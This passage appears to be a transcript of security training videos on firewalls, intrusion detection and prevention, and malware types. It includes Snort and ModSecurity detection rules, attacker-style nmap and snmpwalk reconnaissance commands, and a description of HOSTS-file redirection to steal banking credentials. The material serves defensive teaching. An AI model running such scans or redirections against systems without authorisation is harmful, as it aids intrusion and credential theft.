encompassing. It really depends on the specific vendor product that you're using as a security appliance.
Pictured on the screen, we've got an example of a security appliance being connected to through a web
browser. [A screenshot displaying an example of a security appliance connected to a web browser is
displayed. The image is divided into many sections, some of which are Appliance Information, License
Information, Signature Information, Connection Information, CPU usage for last two hours, and Memory
usage for last two hours.] Now, what we can see in the license information section are the components of the
security appliance. The first one is a web and application filter. The second component is Intrusion Prevention
System, IPS. Then we've got antivirus, antispam, we've got a web application firewall and so on. So security
appliances usually have a nice web-based interface that's easy to navigate, so you can not only configure the
various firewall capabilities, but also monitor them or maybe even configure notifications when certain events
occur. Some common examples of security appliances include SonicWALL's Network Security Appliance,
Barracuda Web Security Gateway, Cisco Meraki, and also Check Point Security Appliance. In this video we
talked about security appliances.
After completing this video, you will be able to recognize the unique capabilities of web application firewalls.
Objectives
[Topic title: Web Application Firewall. The presenter is Dan Lachance.] In this video, we'll talk about Web
Application Firewalls. A Web Application Firewall is often referred to as a WAF, spelled W-A-F. It's specific
to HTTP connections, and it's designed to mitigate HTTP specific attacks, including things like cross-site
scripting or XSS.
With cross-site scripting, we've got a malicious user that tries to inject scripts that get executed in the client
web browser into web pages. And sometimes this is possible if the developers of a web page haven't carefully
validated the input into the fields. So an attacker then could put some kind of executable script in there. And
then that page would be viewed by an unsuspecting victim where that client side scripting code would execute
within their web browser and do malicious things. Now, another type of HTTP attack handled by web
application firewalls, among many others, are SQL injection attacks. Now, again, this is usually executed by a
malicious user inputting database instructions within a field that isn't properly validated on a web form.
And so, the web server then, takes that data in, and executes it against a back end database where it might
reveal information from the database that otherwise wouldn't normally be exposed. Web application firewalls of course
can be customized due to the various different technologies that might be used with web services. And they are
more specialized than packet filtering firewalls because packet filtering firewalls apply up to layer four of the
OSI model. Now, that deals with things like port addresses, where layer three deals with things like IP
addresses and essentially looking at different packet header fields. But here, we're talking about looking at a
little bit more detailed information within the packet payload, essentially up to layer seven. So the web
application firewall then can come in the form of an appliance, either hardware or software based. It could also
be a server operating system plugin. In the cloud we might have web application firewall services offered by
the cloud provider or if not we might have a virtual security appliance from a specific vendor that we're
running in the cloud as a virtual machine. Take for example Barracuda, where we take a look at their virtual
appliances listed over here on the right hand side of the screen. [The barracuda web site is open. the right-
hand side of the page displays a section named barracuda Virtual Appliances which includes many
subsections, some of which are Barracuda nextGen Firewall F Vx, barracuda Email Security Gateway Vx, and
Barracuda Web Application Firewall Vx.] And there are many vendors that do this, so if we scroll down the
list of virtual security appliances, eventually we'll come across the Barracuda Web Application Firewall. And
of course, if we click on that link, we'll get some details related to it.
And essentially what we're talking about doing with this is bringing down a virtual appliance that we can then
deploy either on-premises or even in the cloud. Web application firewalls are normally configured and
monitored through an HTTPS connection. The web application firewall can also do many other things like
monitoring traffic entering and leaving a specific web app, and so we can detect abnormal HTTP activity. It
sort of has intrusion detection capabilities built in. So it might look for abnormal activities such as large
volumes of unexpected data input to a web application. So this could indicate that a buffer overflow attack is
being executed. Or it could indicate that we've got a denial of service, or if many machines are involved, even
a distributed denial of service attack that's in progress. Also, abnormal database query strings supplied as input
would indicate perhaps a SQL injection attack. So this can be monitored at the web application firewall level.
However, application developers still need to follow secure coding practices to do things like validate input
correctly on web forms. Common web application firewall products include NAXSI, an open source Nginx module whose name stands for Nginx Anti-XSS and SQL Injection. Also ModSecurity, which is open source, products from Imperva, the Citrix NetScaler product and also appliances from Barracuda. In this video, we
talked about Web Application Firewalls.
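As a hedged illustration of the kind of rule a WAF evaluates, here is a minimal sketch for ModSecurity, one of the open source products just mentioned. The rule ID is arbitrary, and it assumes a ModSecurity version that includes the libinjection-based @detectSQLi operator:
# deny the request with a 403 if SQL injection is detected in any request argument
SecRule ARGS "@detectSQLi" "id:100001,phase:2,deny,status:403,msg:'Possible SQL injection detected'"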
After completing this video, you will be able to explain the importance of intrusion detection and prevention.
Objectives
[Topic title: Intrusion Detection and Prevention Overview. The presenter is Dan Lachance.] Today's
networks, more than ever, are potentially susceptible to malicious activity. This could be due to things like the
use of smartphones by everybody to connect to corporate resources and things like ransomware. In this video
we'll talk about intrusion detection and intrusion prevention.
Host Intrusion Detection Systems, or HIDS, are specific to a host, which normally would be running some
kind of specific application that we're trying to protect from malicious activity. But we can also use Network
Intrusion Detection Systems, or NIDS. Network Intrusion Detection Systems aren't specific to a host, but
instead are placed carefully on the network to look for anomalous network activity. So the detection part
comes through monitoring, where one way to do this is to compare current activity data to a known threat database. Or compare it to a baseline of normal activity that was taken within a specific environment. Intrusion
detection also can log suspicious activity. Now in that case, we want to make sure that wherever that
information is logged to is kept secure.
So for instance, we might enable log forwarding from a device where we've got intrusion detection being
monitored so that it gets stored elsewhere. We can also correlate current data with related or even older data
historically, to determine that some kind of suspicious activity is taking place. Intrusion detection can also send
notifications to administrators about suspicious activity. Intrusion prevention comes in a couple of forms,
including Host Intrusion Prevention Systems, or HIPS. Of course, much like with intrusion detection, there's
also Network Intrusion Prevention Systems, or NIPS, that work at the network level. Now not only is detection
possible with intrusion prevention, but there can also be an attempt made by the solution to prevent further
damage.
Now intrusion detection and prevention solutions could come in the form of physical hardware, or a virtual
appliance, or software installed within a server OS. Now with intrusion prevention we monitor for suspicious
activity, we can compare that to a known threat database or against a baseline of normal activity, just
like with intrusion detection. But intrusion prevention allows us to extend that a bit further. So besides the
normal logging of suspicious activity or correlating with current related or older data, and sending notifications
about this activity. Intrusion prevention systems can be configured to attempt to stop the activity once it's
detected. Now this could come in many forms depending on what it is it detects. For instance, we might have
our intrusion prevention system configured to block connections from offending IP subnet ranges or addresses
if we've got suspicious activity from those sources. Or maybe to block a port for an attack that's in progress.
Now you might want to be careful with this when you configure the parameters for that kind of setting.
Because if we're talking about a web server, and it looks like it's being attacked with a distributed denial of service attack, do you really want to block that web server port? Because you're also preventing legitimate connectivity. But the argument against that of course is that, well, legitimate activity won't occur anyway if it's
being overloaded with useless traffic. We should also consider whether we want to quarantine things like
suspected malware or suspected processes. This is also considered suspicious activity. This needs to be
configured for the specific environment that you want to use this in. And the reason is because you might end
up with too many false positives, things that could potentially appear to be suspicious and therefore you might
be closing ports or stopping processes when in fact they're benign. So it is specific to each and every
environment. In this video we did an intrusion detection and prevention overview.
After completing this video, you will be able to recognize when to use a HIDS.
Objectives
[Topic title: Host Intrusion Detection Systems. The presenter is Dan Lachance.] In this video, we'll talk about Host Intrusion Detection Systems, or HIDS. A HIDS can compare current activity data captured on a host to a known threat database. It
can also compare current activity data to a baseline of normal activity. But that's only going to work properly if
a baseline of normal activity for a given host has already been taken. You might have to capture activity, for
example, perhaps for a few days or for an entire work week on a system to determine what's normal in the first
place. Because from that our Host Intrusion Detection System can then have some kind of relative comparison
point or reference point where it can determine what is suspicious or abnormal.
The Host Intrusion Detection Systems might come in a hardware form, it might be rack mountable equipment.
Or it might be software you install within a server operating system. It might be a dedicated virtual machine
appliance that you run on-premises or in the cloud. There are many various solutions available. Host Intrusion
Detection Systems are designed to monitor details or activity related to a specific application. However, it's
common that you need to train your Host Intrusion Detection solution for your specific environment. Some
HIDS solutions have a learning mode where you can have them establish a baseline of normal usage activity.
However, you might also have to manually configure specific rules or tweak them yourself to eliminate false
positives. A false positive is essentially a triggered alert for something that the system thinks is suspicious
when in fact it's actually normal and benign. So, what we see on the screen then is an example of a Snort rule.
The Snort IDS or Intrusion Detection System, is a common open source IDS solution. So, in this example, we
are configuring an alert. [The following code is displayed: alert icmp any any -> any any (msg:"ICMP Traffic
Detected";sid:3000003;). Code ends.] What it's going to do is generate an alert if there is any ICMP traffic
from any host to any host, and we're assigning it a Snort ID rule, here seen as 3000003. And we can determine
if we configure Snort further, whether we are generating email notifications, writing to a log or doing both
and so on. So that's a sample Snort IDS rule. How you configure the rules will vary depending on your
solution. Some are more graphically based, whereas Snort, as we can see here, allows us to configure our rules at the command level, although that does give us increased flexibility. With a Host Intrusion Detection
System, it has the ability to run on the host itself as opposed to on the network. What this means is that for applications dealing with encrypted network data, that data gets decrypted by the host. This means that the decrypted version of the data is then available for IDS examination. Whereas, with a Network Intrusion
Detection System in most cases any encrypted network data isn't examined by the Network Intrusion Detection
System. There are some exceptions because there are some Network Intrusion Detection Systems that do have
the ability for you to specify an encryption key. Or to import, for example, a PKI certificate that contains a
decryption key. In this video we talked about Host Intrusion Detection Systems.
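Building on the sample rule above, here's a sketch of a similar rule for a different protocol, along with Snort's configuration test mode. The SID, the $HOME_NET variable, and the configuration file path are assumptions that depend on how your snort.conf is set up:
# alert on any attempted Telnet connection into the home network
alert tcp any any -> $HOME_NET 23 (msg:"Telnet connection attempt"; sid:3000004; rev:1;)
# validate the configuration and rules without starting a capture
snort -T -c /etc/snort/snort.conf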
[Topic title: Network Intrusion Detection Systems. The presenter is Dan Lachance.] In this video we'll talk
about network intrusion detection systems. Network intrusion detection systems are often referred to as NIDS.
They're designed to look for inappropriate or unauthorized use on the network as a whole, as opposed to on a specific host on the network.
So it can be configured to compare current activity data to known threats on the network. Or it can be configured, instead or in addition, to compare current activity data on the network to a baseline of
normal activity. But much as is the case with a host intrusion detection system, a network intrusion detection
system has to have an existing baseline of normal activity.
And what's normal on a network within one company will be different from what is normal on a network for a
different company. So it is specific to an organization. We need to consider the placement of the NIDS on the
network. So for instance, if we want our network intrusion solution to be able to monitor all network traffic,
we must make sure it's placed appropriately so that it can see all network traffic. So if we were specifically
doing this for Internet traffic, inbound and outbound, we'll probably want to make sure that our NIDS is in the
middle of the connectivity between our internal network and the Internet. In the case of network switches, we
might have to plug our network intrusion detection system into a specific switch port. And the switch
administrator might have to configure port mirroring, copying the traffic from all ports to the one that the NIDS
is plugged into. Just like with host intrusion detection systems, a NIDS could be a hardware appliance.
Or it could be software installed in a server operating system, or it might be a specialized operating system, an appliance essentially, whether it's a virtual appliance that you run in the cloud or one that you run on premises. The network intrusion detection system needs to be trained for your specific environment, again,
similar to a host intrusion detection system. Many NIDS solutions will have a learning mode, where essentially
you can configure it to monitor activity for a period of time to establish a baseline of normalcy in your
environment. You can also, instead of or more commonly in addition to that, configure specific rules for what is considered suspicious network activity and what to do about it. And also you can tweak it to eliminate
false positives. On the encrypted network data level, generally speaking network intrusion detection systems
can't examine encrypted data. Now of course, as always there are exceptions to every rule.
There are some NIDS systems that will allow you to specify decryption keys in various forms so that they can
examine encrypted data. But generally speaking, this is not the case. So we might have one solution that does
allow us to enter perhaps a symmetric key or phrase, or even to import a PKI certificate for decryption. A
NIDS looks for various hints of abnormal network activity. And that's going to include things like
reconnaissance. Reconnaissance is one of the first phases an attacker would undertake before they start to try
to exploit vulnerabilities.
Basically, it's learning for the malicious user about what's out there. This can be done through ping sweeps to
determine which hosts are actually up and running on the network. Or conducting port scans to identify which
network services are running on hosts on the network. Also it includes SNMP scanning. SNMP stands for
Simple Network Management Protocol. This has been around for decades. And it's a way for us to use a
management station to query information about a network device, whether it's a server, a router, a switch and
so on. So we can get statistics through SNMP by querying an SNMP MIB, Management Information Base. Or
in some cases SNMP can also be used to write configuration changes over the network to network devices.
SNMP normally occurs over UDP port 161. So that might be something we want to consider when configuring
packet filtering rules.
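To picture the kind of reconnaissance traffic a NIDS is tuned to notice, here's a sketch of what the attacker's side might look like using common tools. The target addresses and the community string are arbitrary examples:
# ping sweep to discover which hosts are up on a subnet
nmap -sn 192.168.1.0/24
# TCP SYN scan of the low port range on a discovered host
nmap -sS -p 1-1024 192.168.1.10
# query a device over SNMP using the default public community string
snmpwalk -v2c -c public 192.168.1.1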
Network exploits, essentially, can be determined because a malicious user will normally try to test discovered
targets for weaknesses. And that might not be normal activity against a service. So for instance, running a
Telnet session to poke and prod at an HTTP server, instead of actually issuing a standard HTTP GET request
to retrieve information from the web page, could be an indicator of suspicious activity. We might also have a
NIDS that looks for hints of denial of service attacks. A denial of service attack, or DoS, D-O-S, essentially is
excessive traffic or activity on a specific host beyond normal usage. Now that might be executed by locally
installed malware or it might be executed even over the network. Common network intrusion detection
products include the Snort open source tool, AlienVault Unified Security Management, or USM, and Symantec
NetProwler, among many other solutions. In this video we talked about network intrusion detection systems.
Upon completion of this video, you will be able to recognize when to use a NIPS.
Objectives
[Topic title: Network Intrusion Prevention Systems. The presenter is Dan Lachance.] In this video, we'll go
over network intrusion prevention systems. Network intrusion prevention systems are often called NIPS, N-I-
P-S, for short. They're designed to look for inappropriate or unauthorized use at the network level. So network
activity then is monitored and compared against known threats or compared against a baseline of normal
activity taken for that network.
Similar to network intrusion detection systems, we should consider the placement of the network intrusion
prevention solution on the network. Because if we needed to see all network traffic then it must be placed
accordingly on the network. Maybe within a demilitarized zone if that's what we're looking for in terms of
network intrusions. Or maybe it needs to be on an internal switch port that can see all traffic within the switch.
Intrusion prevention allows us not only to identify potential suspicious activity as network detection does.
But it has the added benefit of being able to do something about it, like responding to threats immediately.
Now it can prevent the exploit of vulnerabilities once suspicious activity is detected and we have to think about
the placement again of this solution. Because it needs to be between the potential threat and the asset that's
being protected. So, for example, our network intrusion prevention solution might be placed after the Internet
firewall, but before our web application server. If that's what we're looking for in terms of network intrusions.
Some prevention actions that are available include the ability to log suspicious activity and notify
administrators of it. Now, that could be considered prevention, of course, not real time, in that administrators
could take action. However, that alone makes this no different from a network intrusion detection system. Now,
what makes it a network intrusion prevention system is the ability to do things like dropping suspicious
packets, blocking connections based on IP subnet ranges or individual addresses. Resetting specific sessions
that seem suspicious, or quarantining malware or suspicious processes. There are many products that allow us
to implement network intrusion prevention. And some of them will support, of course, both network intrusion
detection and prevention within the same solution, whether it's a hardware appliance or a software solution.
Common products include the open source Snort tool, Trustwave's Intrusion Detection and Prevention
solution, and Symantec NetProwler. In this video, we talked about network intrusion prevention systems.
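Under the hood, a prevention action such as blocking an offending subnet often amounts to something as simple as the following on a Linux-based sensor or firewall. The subnet here is a documentation example, and the exact mechanism varies by product:
# insert a rule at the top of the chain to drop all traffic from the offending range
iptables -I INPUT -s 198.51.100.0/24 -j DROP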
Find out how to prevent threats from materializing and follow proper forensic procedures.
Objectives
Exercise Overview
[Topic title: Exercise: Prevent and Investigate Security Problems. The presenter is Dan Lachance. ] In this
exercise, you'll begin by differentiating packet filtering firewalls from proxy servers. Then, you'll differentiate
host intrusion detection systems from host intrusion prevention systems. You'll then explain ransomware.
You'll then view deleted files on a hard disk. And finally, you'll configure the Windows firewall to allow
inbound SSH traffic from the 172.16.0.0/16 network. At this point, pause the video, go through each of these
exercise steps and then come back here to view the results.
Solution
Packet filtering firewalls allow or deny network traffic. Criteria can be based on the packet headers but not the
content or the payload in the packet itself. So we can build our criteria based on source and destination IP
addresses, source and destination ports, protocol type and so on. Proxy servers, on the other hand, can protect
the identity of internal clients. This is because outgoing traffic is really done by the proxy server on behalf of
the internal client. And proxy servers also have the ability to examine application level data. So they can look
all the way down into the payload, or data within the packet, beyond just its headers, like packet filtering
firewalls do. A Host Intrusion Detection System, or HIDS, runs on a specific host and can examine host
processes and logs. It can examine application-specific nuances, and then it can detect related anomalies.
The anomalies can be logged, and/or notifications sent. With an Intrusion Prevention System, in this case a
Host Intrusion Prevention System, the added capability is of stopping suspicious activity beyond just logging
and notifying of it. Ransomware is a form of malware where use of the computer system could be blocked while the attacker waits for a payment. And then, if the payment is made, some kind of a code is given to the
victim and they can continue using their system. Another form of ransomware will encrypt files. And in the
same way, the ransom must be paid, in this case, before the files are decrypted. There are hundreds of tools
that can be used to view deleted files, in this case, on the Windows platform. Here I'm going to use the
Restoration tool, [Dan accesses the Restoration tool and the Restoration Version window opens.] where I can
tell it which disk I want to view. And then I can simply put in wildcards if I only want to see certain types of
files. Or I can just click Search Deleted Files if I want to see them all. While the Windows firewall can be
configured here in the GUI, it can also be configured at the command line. For instance, using PowerShell
cmdlets. Here we'll use the GUI. So we're going to build an inbound rule as the exercise stated. So I'll right-
click build a New Rule. [He right-clicks the Inbound Rules subnode and selects New Rule from the shortcut
menu and the New Inbound Rule Wizard opens.] It's going to be based on a Port, because it was for SSH. So
the port number is going to be TCP port 22. And I want to Allow the connection. And I'll apply to all of the
network profiles, and I'll specify a Name. I'll call this SSH In. Now after the rule is created for SSH In, I'm
going to double-click and open it up and [The SSH In Properties dialog box opens which displays many tabs
such as Protocols and Ports, Scope, and Advanced.] click the Scope tab, where I can specify IP address ranges
where we can allow connections from. For example, 172.16.0.0/16, [He enters the IP address in the IP
Address window.] as was required in the exercise.
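For reference, the same exercise rule could be created in one step from PowerShell. This is a minimal sketch that uses the rule name and scope from the exercise; the cmdlet parameters are assumptions about how you'd express them at the command line:
# inbound SSH allowed only from the 172.16.0.0/16 network, applied to all profiles
New-NetFirewallRule -DisplayName "SSH In" -Direction Inbound -Protocol TCP -LocalPort 22 -RemoteAddress 172.16.0.0/16 -Action Allow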
[Topic title: Malware Overview. The presenter is Dan Lachance.] In this video we'll do a malware overview.
Malware is malicious software. This type of software gets installed and runs on a machine without user
consent or through trickery. Malicious user motivations for creating, deploying and using malware come from financial gain or bragging rights. There could be political or ideological reasons why they are executing these types of infections, or it could simply be for reconnaissance to learn more about a potential target that they want to
compromise. Malware types come in many forms. We could have viruses which attach themselves to files,
worms, which are self-propagating over the network using standard file sharing methods, or Trojans, which
essentially look not suspicious, but rather they look legitimate, they look benign. But they in fact contain a
malware payload. Or we could have spyware that monitors our activity, for example, our web surfing habits or
our banking habits. But how does a malware infection actually occur? Well, this list is just the tiniest of
samplings. There are many ways this can occur. One way is by people downloading BitTorrents. Whether
they're downloading the latest movie that's in the theaters that perhaps they really shouldn't be doing due to
copyright laws, or they're downloading things that they otherwise would need to pay for legitimately. Often
with a BitTorrent download indeed it does contain what the user was looking for, for example, the latest
theatrical release of a movie. But at the same time, when that movie is run it could be executing malware in the
background, unbeknownst to the user. Even viewing a web site in some cases can infect a machine without
even clicking anything on the site. This is often called a drive-by infection.
Now, it does depend, of course, on the web site and its nature of malicious content. But it also depends on the
user's web browser and how it's configured. Now certainly, if the user gets a message about their computer
being infected and then they click on a link to run a scan, which in itself is really infecting the machine. That's
the user actively clicking on something. But there are times when the user doesn't have to click on anything
and their machine can still be infected. So installing software that seems benign, such as, for instance, a virus
scanner, or any type of free software especially. Clicking a web site link that a user might receive in an email,
and often these are targeted to users. And the text in the message is often convincing to trick the user into
thinking this is specifically for them. Maybe to reset a banking account password or so on. Opening file
attachments should also be approached with suspicion. Unless we are expecting a specific file attachment, we
should be very careful as to whether or not we're going to open it. Symptoms of a malware infection include
things like performance degradation on the machine, so the machine slows down. We might also get email
notifications regarding abnormal account usage.
And it might actually be legitimate. We might get an email notification from our bank, or PayPal or our email
account, whether it's Google or Outlook.com. But we have to be careful. Because how do we know that this
email notification itself isn't some form of social engineering or trickery? Any unexpected change to settings on the machine could potentially indicate an infection. It could also have been pushed centrally by an
administrator's configuration change. However, things like web browser start pages being changed and not
being able to be changed back, or processes running in the background that we're not familiar with, potentially
could indicate an infection. But you want to be careful because sometimes they could be legit. Any unexpected
newly installed web browser plugins could also be an indication of an infection, as are disabled software
update mechanisms. A malware toolkit facilitates the creation of malware for a malicious person. And there
are many of them out there, believe it or not. So, for instance, the Blackhole exploit kit contains tools and
tutorials and documentation on how to create and propagate malware. There are also underground chat rooms
on the Internet that are available. And of course, membership is by invitation only, where there is actually
malware for sale to the highest bidder. So how do we mitigate malware? Number one, user awareness and
training. Everybody in the organization needs to be in the know about understanding how easy it is to infect a
machine even through trickery or social engineering.
We should also make sure we've got up to date antimalware scanning on all devices, including smartphones.
The same thing is true for personal firewalls. It needs to be on every device, looking at traffic coming into the
device and leaving the device even at the smartphone level. We should always, within the corporation, limit
use of removable media because that's one way that infections can be brought into an environment. Of course,
your antimalware scanner might pick it up before it causes damage. We should also limit Internet file
downloads and be very suspicious when opening links in email messages, as well as opening file attachments
from email messages. Common malware products or rather antimalware products include those from
Kaspersky, McAfee, Sophos, AVG and Windows Defender. Now just because we might be using a free
antimalware solution like Windows Defender, doesn't necessarily mean it's not as good as some of the paid
solutions. Now of course with a malware solution at the enterprise level, we want some kind of centralized
way to deploy and control the configuration of our antimalware and also have some kind of central notification
and reporting mechanism available. Now in that case, you might have to pay for a solution that does that. But
just because you're paying for an antimalware solution doesn't necessarily mean it's better than the free ones. In
this video we discussed malware.
identify viruses
[Topic title: Viruses. The presenter is Dan Lachance.] In this video, we'll discuss viruses. A virus is a form of
malware that installs and runs without user consent or through trickery, or maybe a combination of both. By
tricking the user to install software that looks legitimate but unleashes a virus in the background. Viruses
normally replicate themselves by attaching to data files, scripts, executable program files, or even disk sectors
in some cases. The way that viruses get transmitted is often through e-mail file attachments that people open,
or in some cases, through files that people download from the Internet. The timing of the virus is such that it
might be executed immediately upon infection, or in some cases, it might wait for a specific date of some
significance or some kind of condition to be met on the machine. So this type of virus that waits for a date or
condition to be met is called a logic bomb. In the 1990s, this is exactly what the Michelangelo virus was about.
It waited until March 6th, in the early 90s, before it would execute. Back in the early 90s, Michelangelo was
transmitted through infected floppy discs. Which these days, can be done through infected USB drives, with
other forms of malware, or infected file downloads from the Internet. The idea with the Michelangelo virus
was that it was a boot sector infecting virus. So when the OS booted, it was resident in memory.
And on Michelangelo's birthday, it was supposed to wipe out the hard disk by overwriting it with
random characters. But in the end, on March 6th of 1992, very few computers were actually affected by the
Michelangelo virus compared to the ominous predictions. A macro virus is embedded in the macro language
code for a specific application. For example, a Microsoft Word macro virus could trigger when a user opens an
infected document that would trigger ransomware to encrypt their files. Of course, the user would then have to
pay a ransom to potentially receive a decryption key. So one thing that we could do is disallow the autorunning
of macros, such as when files are opened. We could only allow the use of trusted and digitally signed macros.
Or, if we don't use macros at all, we're probably better off completely disabling them to reduce our attack surface.
Consider the example of macro security here in Microsoft Excel. [A Microsoft Excel file named Book1 is
open.] I'm going to go to the File menu, where I'm going to go all the way down to Options. [The Excel
Options dialog box opens which displays many tabs. Some of the tabs are General, Formulas, Proofing, Save,
language, Advanced, Customize Ribbon, Quick Access Toolbar, Add-ins, and Trust Center. The box also
includes buttons named Ok and Cancel.] On the left, I'll then click on Trust Center. And then on the right, I'll
click the Trust Center Settings button. [The Trust Center dialog box opens. The box is divided into two
sections. The first section displays many tabs such as Macro Settings, Protected View, Trusted Locations, and
Message Bar. The Macro Settings tab is selected by default and the second section displays information
related to the selection made in the first section. Information on Macro Settings and Developer Macro Settings is displayed. In the Macro Settings section, the Disable all macros with notification option is selected by default. The
box includes two buttons named Ok and Cancel.] Here on the left, you can see that Macro Settings are
selected. So on the right, it's currently set to disable all macros with a notification.
But there are other options, such as disabling all macros without a notification, disabling all macros except
those that are digitally signed and, of course, trusted. Or, we could enable all macros, which is definitely not
recommended. And again, if your users don't even use macros, you might completely disable them in this specific
application. Now, here in Microsoft Excel, over on the left, we've also got Trusted Locations. [Dan clicks the
Trusted Locations tab and the second section displays the Trusted Locations.] In other words, locations on the
network from which we are allowed to open files. So files in other folders might not be trusted and might
prompt us with a warning message. There are countless malware examples, including Stuxnet, discovered in 2010. This one damaged uranium enrichment equipment in Iran, and it was propagated as a worm. So it was self-propagating over a network. 2008 saw the emergence of the Conficker worm, which was a botnet infector. A botnet, of course, is a group of computers under a single malicious user's control. And of course, now in 2016, we keep hearing
about occurrences of ransomware. So in various ways, this malware is triggered, such as opening an infected
document or clicking a link. And what happens is, it could infect files by encrypting them and requiring a
ransom payment before potentially providing a decryption key. In this video, we talked about viruses.
identify worms
[Topic title: Worms. The presenter is Dan Lachance.] In this video we'll discuss worms. Worms are a form of
malware that is often delivered through a Trojan mechanism. A Trojan means that the user receives something that appears to be benign, such as useful software that they might download and install, when in fact it is simply used as a trick to deliver the malware to the user's PC or smartphone. Worms are self-propagating over a network, so they don't require an existing host file to attach themselves to. Worms spread when one machine gets infected, either due to some kind of vulnerability exploit or through social engineering, which is tricking the user into downloading something, clicking a link, or opening a file attachment. With a worm, network transfer is used to copy itself to other systems. So again, it's self-propagating. This can be done through file and print sharing over the network, FTP (the File Transfer Protocol), or SSH (Secure Shell), which is used to remotely administer network devices like servers, routers, and switches over the network. It can also be transferred through email and instant messaging.
So basically, worms can spread themselves through many common communication techniques. Once worm infections actually run, besides spreading themselves, they might spy on computing habits. They might steal sensitive information, such as sensitive files stored on your computer or files accessible elsewhere through your computer, such as on a database server or in the cloud. Or a worm might monitor keystrokes. It might be a keylogger that sends those keystrokes back to malicious users. A worm could also redirect users to fraudulent sites. For instance, a worm could modify the local system's HOSTS file, which is checked before DNS servers to resolve names to IP addresses. In this example, a malicious user might spy on your habits and take note of your preferred bank for online banking. They might then make a HOSTS file entry that redirects that bank's host name to a website under their control that looks just like the real banking site, but is really just designed to steal your banking credentials before displaying a message about the bank experiencing technical difficulties. A quick way to check for this kind of tampering is sketched after this topic. Worms, of course, can also consume enormous amounts of network bandwidth, which could be an indication that an infection is underway. In this video we discussed worms.
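As a minimal illustration of that HOSTS file trick, here is a hedged sketch for a Linux host; the IP address and bank host name are made-up placeholders, and on Windows the equivalent file lives at C:\Windows\System32\drivers\etc\hosts.

# An attacker-added entry might look like this (203.0.113.45 is a documentation-range
# address standing in for the attacker's web server; examplebank.com is hypothetical):
#   203.0.113.45   www.examplebank.com
# List every active entry in the HOSTS file so unexpected redirections stand out
grep -v '^#' /etc/hosts
# Flag any entry that mentions the bank's domain, which should normally never be there
grep -i 'examplebank' /etc/hosts && echo "Suspicious HOSTS entry found"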
[Topic title: Spyware, Adware. The presenter is Dan Lachance.] In this video, I'll discuss spyware. Spyware is
a form of malware, and like most malware, it installs and runs without the user knowing about it. Spyware,
specifically, is designed to secretly or covertly gather information about things like our computing habits, the
software that we use, and files that we access and perhaps the contents within them, as well as gathering keystrokes that we enter as we type on the keyboard. That includes when we authenticate to various resources, like internal servers or online banking sites, so it would reveal our credentials if we're using a username and password to authenticate. So therefore, spyware gathers data that could be
very valuable for marketing purposes. So the motivation is clear, it could be for financial gain or it could be to
gather credentials to further compromise other systems or networks. Adware is another form of malware. And
like all malware, it installs and runs normally without user consent. However, that's not necessarily always the
case. Adware is designed to display appropriate advertisements. Now, what does appropriate mean in this
context? It means based on your computing habits, it somehow monitored what you've been doing, what
you've been searching for, and looking at on the Internet and displays related advertisements.
So it might look at things like sites that were visited, searches that were conducted, and just generally how the
computer is used. We want to be careful when we install free software, because this is an example of how spyware or adware might be installed, not exactly without our consent, but because we had the option to uncheck something and didn't. So when you install free software, you sometimes have to be aware of additional software installed along with it. If all you're doing is, in a rush, installing free software and clicking Next, Next, Next through the installation wizard, you might not read a message that tells you it's going to install something else, like another browser plugin. Whereas, if you were a little less hasty, you could have unchecked that additional software installation, because it might itself be spyware or adware. So, basically, be careful, take your time, be suspicious about these things, and read all
agreements before you install things like free software. Now of course, as is the case with all malware, we
want to make sure we're running up-to-date antimalware software on every network device. Now, this might
even include installing a browser plugin to block ads. But again, be careful, because sometimes malware passes itself off as antimalware. In this video, we talked about spyware and adware.
[Topic title: Ransomware. The presenter is Dan Lachance.] In the real world, a ransom payment is required
when something of great value to somebody is being held by an unauthorized party. In this video, we'll talk
about ransomware. Ransomware is a rampant form of malware that is spreading all over the world in 2016,
although that's not when it began. But it seems to be more prevalent than ever now. In its most common form, ransomware will encrypt files that the victim has write access to. That includes files stored locally on a device and even over the network, including in the cloud. So what happens is, when a ransomware infection initiates, it will contact a command and control center on the Internet, awaiting instructions from the malicious user. A ransom payment is demanded, and in turn the attacker will provide a decryption key, or so they claim. Other variants of ransomware prevent computer access, maybe upon boot up. The system requires some kind of special code, and unless payment is received, the code is not provided. So therefore, the system is not
usable. Now, ransomware scare tactics include legitimate looking logos or sites that look like the real thing,
but in fact, are not.
Now, often, these scare tactics would include messages that appear to be coming from law enforcement. For
example, if you're on the Internet conducting searches, you might get a pop-up message that even includes the
local law enforcement logo that looks legitimate and demands payment, otherwise you could face imprisonment based on what you've been looking at on the Internet. The same kind of thing also happens
through tax agencies. Everybody has to pay taxes, but many people don't like it, and they're very much afraid
of the taxing authorities. So if we get a message, whether it's a pop-up in our browser or an e-mail message
saying either that we have a tax refund or, as a scare tactic, that we owe tax money in arrears, many people will be fooled into thinking that they must act on it. And, in fact, when they submit a
payment, it's actually going to the malicious users. Consider the example on-screen, which is a real e-mail
message that I received a while ago. [A screenshot of a fraudulent mail is displayed in which the sender's e-
mail address is fake. The mail includes a link titled Your request can be made here.] This message claims to
be from the Canada Revenue Agency, but up at the top, if we take a look at the e-mail address, that does not
look legitimate. And, essentially, I can make a request simply by clicking the provided link, to claim my
refund of $318.12 in Canadian funds. Now, of course, this is not a legitimate e-mail message, it's a phishing e-
mail.
And when I actually click the link, it might simply gather some personal information about me. Or, it could
infect my computer and perhaps even encrypt files using ransomware. Consider this second example where we
have a message in a browser that appears to come from the Royal Canadian Mounted Police that says that all
of the files on our machine are encrypted. [A screenshot of a web site purporting to be the web site of the
Royal Canadian Mounted Police is displayed.] And this is due to a violation on our part of some kind of law,
whether it's copyright infringement, viewing or distributing prohibited pornographic contents, or some kind of
illegal access from our PC. Now, of course, unsuspecting victims get afraid and will pay a ransom, and also
pay a fine of some kind so that they get their machine back and also avoid imprisonment. It's just another scare
tactic invoked by scammers. So any time you get one of these messages, whether it's an e-mail or a web pop-up, from some kind of authority, like a government agency, always question it twice. And if you need to, make a phone call.
Don't just click on links randomly because you feel threatened in some way based on the message that you're
seeing. With a ransomware infection, this can often be propagated by downloading Internet files, or by
installing software that appears legitimate, but might also be infected as well. We might infect our machine
with ransomware by visiting a webpage, by clicking a link, either on a webpage or through e-mail, even by
opening an e-mail file attachment that has some kind of an autorun virus. Ransomware payment is usually
requested in Bitcoin, where Bitcoin is unregulated. That doesn't necessarily mean it can't be traced, but it's not
regulated by any single governing authority. However, even if you make a ransomware payment, there is no
guarantee that you will get a decryption key or a code to unlock your computer.
However, in some cases, ransom payment may actually be cheaper than spending the time to recover systems
and data through imaging and through backups. That's not to say that we should pay ransom, but it's just a
